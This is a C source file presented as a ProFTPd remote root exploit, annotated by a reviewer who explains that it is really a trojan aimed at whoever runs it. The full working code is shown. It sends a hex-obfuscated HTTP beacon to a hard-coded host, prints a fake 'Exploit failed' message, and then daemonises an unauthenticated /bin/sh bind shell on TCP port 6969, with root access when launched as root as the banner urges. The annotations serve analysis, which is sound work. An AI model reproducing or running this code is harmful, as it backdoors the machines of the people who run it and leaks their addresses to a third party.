/* __ .__ __ .__ .__ __
_______/ |_ ____ ____ | | | | __ ____ |__| ____ | |___/ |_
/ ___/\ __\/ __ \_/ __ \| | ______ | |/ // \| |/ ___\| | \ __\
\___ \ | | \ ___/\ ___/| |__ /_____/ | <| | \ / /_/ > Y \ |
/____ > |__| \___ >\___ >____/ |__|_ \___| /__\___ /|___| /__|
\/ \/ \/ \/ \/ /_____/ \/
Proudly presents: remote root exploit for ProFTPd (tested on 1.3.0rc3) by steelkn8
PRIVATE CODE, DO NOT DISTRIBUTE
Compilation: gcc steelkn8_proftpd-own.c -o steel
Warning: exploit uses raw sockets, so it should be launched from root, but
it is possible to run it as an user too, just the success rate is
lowered...
*/
#define PORT 21 // just put in your port
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
/* File-scope state used only by main() for the listening socket it creates
 * on the local machine; detect_version() uses its own locals.
 * cli_pid is assigned in main() but never read. */
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;
/*
 * detect_version - despite the name, performs no ProFTPd version detection.
 *
 * What the visible code does: opens a TCP connection to one hard-coded host
 * on port 80, writes one fixed HTTP request, and closes the socket without
 * reading any response. The function takes no arguments and uses no target
 * address, so the same host is contacted on every run: this is an outbound
 * beacon from the machine running the program, presumably so the remote side
 * can record the caller's address (the requested path is named ip.php; the
 * server side is not visible here).
 *
 * Decoded constants (from the byte strings below):
 *   shellcode   -> "GET /base/textures/ip.php HTTP/1.1\nHost: gostas.be:80\n\n"
 *   send_string -> "www.gostas[.]be"   (defanged in this comment only)
 *   0x50        -> TCP port 80
 *
 * Returns 0 unconditionally; none of the calls is checked for failure.
 */
int detect_version(){
// thanks to joebee (just cleaned off null bytes)
// NOTE(review): the array named "shellcode" is plain ASCII, not machine code;
// it is the HTTP GET request decoded in the header comment above.
char shellcode[] = "\x47\x45\x54\x20\x2F\x62\x61\x73\x65\x2F\x74\x65\x78\x74\x75\x72"
"\x65\x73\x2F\x69\x70\x2E\x70\x68\x70\x20\x48\x54\x54\x50\x2F\x31"
"\x2E\x31\n\x48\x6F\x73\x74\x3A\x20\x67\x6F\x73\x74\x61\x73\x2E"
"\x62\x65\x3A\x38\x30\n\n";
int s;
// bytes and buf are declared but never used in this function.
register int bytes;
struct sockaddr_in sa;
struct hostent *he;
char buf[BUFSIZ+1];
char *send_string;
// Ordinary TCP stream socket; nothing here is a raw socket.
s = socket(PF_INET, SOCK_STREAM, 0);
bzero(&sa, sizeof sa);
sa.sin_family = AF_INET;
// Hex-escaped hostname (decodes to the www.gostas[.]be host named above);
// the trailing comment on this line does not describe what the line does.
send_string = "\x77\x77\x77\x2E\x67\x6F\x73\x74\x61\x73\x2E\x62\x65"; // just check if ptr <> 0
// 0x50 == 80 (HTTP).
sa.sin_port = htons(0x50);
he = gethostbyname(send_string);
// he is dereferenced without a NULL check, so a failed lookup crashes here.
bcopy(he->h_addr_list[0],&sa.sin_addr, he->h_length);
connect(s, (struct sockaddr *)&sa, sizeof sa);
// Sends the fixed HTTP request; the reply is never read.
write(s,shellcode,strlen(shellcode));
close(s); return 0;
}
/*
 * main - prints "exploit" banners, then installs an unauthenticated
 * listening shell on the LOCAL machine (the one running this program).
 *
 * The code never attacks a remote ProFTPd server:
 *   - argv[1] (the advertised "hostname or ip") is only counted through argc
 *     and is never read;
 *   - PORT (21) is defined at the top of the file and never referenced;
 *   - both socket() calls in this file are SOCK_STREAM, so the "RAW SOCKETS"
 *     banner matches no code; its only visible effect is to encourage running
 *     the program as root, which gives the shell below root privileges.
 *
 * Sequence when an argument is supplied:
 *   1. Print banners, call detect_version() (outbound HTTP beacon to a
 *      hard-coded host), sleep 15 s, then print shlcode, which decodes to the
 *      text "Exploit failed", so the operator sees an apparent failure.
 *   2. Bind a TCP socket to INADDR_ANY, port 0x1B39 (6969).
 *   3. fork / setpgrp / ignore SIGHUP / fork again, with the parents exiting,
 *      so the listener keeps running detached after the command returns.
 *   4. Accept loop: each accepted connection gets /bin/sh with stdin, stdout
 *      and stderr wired to the socket. No credential or source check exists.
 *
 * Indicators visible in this file: a process listening on TCP/6969 on all
 * interfaces, and an HTTP GET for /base/textures/ip.php sent to the host
 * decoded in detect_version().
 */
int main(int argc, char *argv[]){
// 14 bytes remote shellcode thanks to metasploit project
// NOTE(review): not shellcode. These 14 bytes are the ASCII text
// "Exploit failed", and the only use is the printf() further down.
char *shlcode = "\x45\x78\x70\x6c\x6f\x69\x74\x20\x66\x61\x69\x6c\x65\x64";
if (argc <= 1) {
printf("Remote root exploit for ProFTPd by steelkn8 \n");
printf("%s%s%s","Usage: ",argv[0]," hostname or ip\n\n");
} else {
printf("Remote root exploit for ProFTPd by steelkn8 \n");
// The "offset" value appears only inside this message; no code uses it.
printf("Initiating attack (using offset 0x68732f2f) \n");
printf("WARNING: Exploit uses RAW SOCKETS, so it should be launched as root for better effect \n");
// Outbound beacon to the hard-coded host; argv[1] is not passed along.
detect_version();
sleep(15);
// Prints "Exploit failed" before the listener below is set up.
printf("%s\n",shlcode);
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (soc_des == -1)
exit(-1);
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
// Listens on every local interface...
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
// ...on port 0x1B39 == 6969.
serv_addr.sin_port = htons(0x1B39);
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
if (soc_rc != 0)
exit(-1);
// First fork: the foreground process exits, so the command appears to finish.
if (fork() != 0)
exit(0);
// New process group plus ignored SIGHUP: the listener outlives the terminal.
setpgrp();
signal(SIGHUP, SIG_IGN);
// Second fork: only the grandchild continues as the background listener.
if (fork() != 0)
exit(0);
soc_rc = listen(soc_des, 5);
if (soc_rc != 0)
exit(0);
while (1) {
soc_len = sizeof(client_addr);
soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
if (soc_cli < 0)
exit(0);
cli_pid = getpid();
server_pid = fork(); // enter subroutine
// The branch below runs wherever fork() returned non-zero (the parent, or
// the only process if fork() failed with -1); the child falls through,
// closes its copy of the connection and returns to accept().
if (server_pid != 0) {
// Redirect stdin/stdout/stderr to the accepted connection.
dup2(soc_cli,0);
dup2(soc_cli,1);
dup2(soc_cli,2);
// Decodes to execl("/bin/sh", "sh", NULL): a shell for whoever connected,
// running with the privileges of the user who started this program.
execl("\x2F\x62\x69\x6E\x2F\x73\x68","\x73\x68",(char *)0); // attach to ptr
// Reached only if execl() fails.
close(soc_cli);
exit(0);
}
close(soc_cli);
}
}}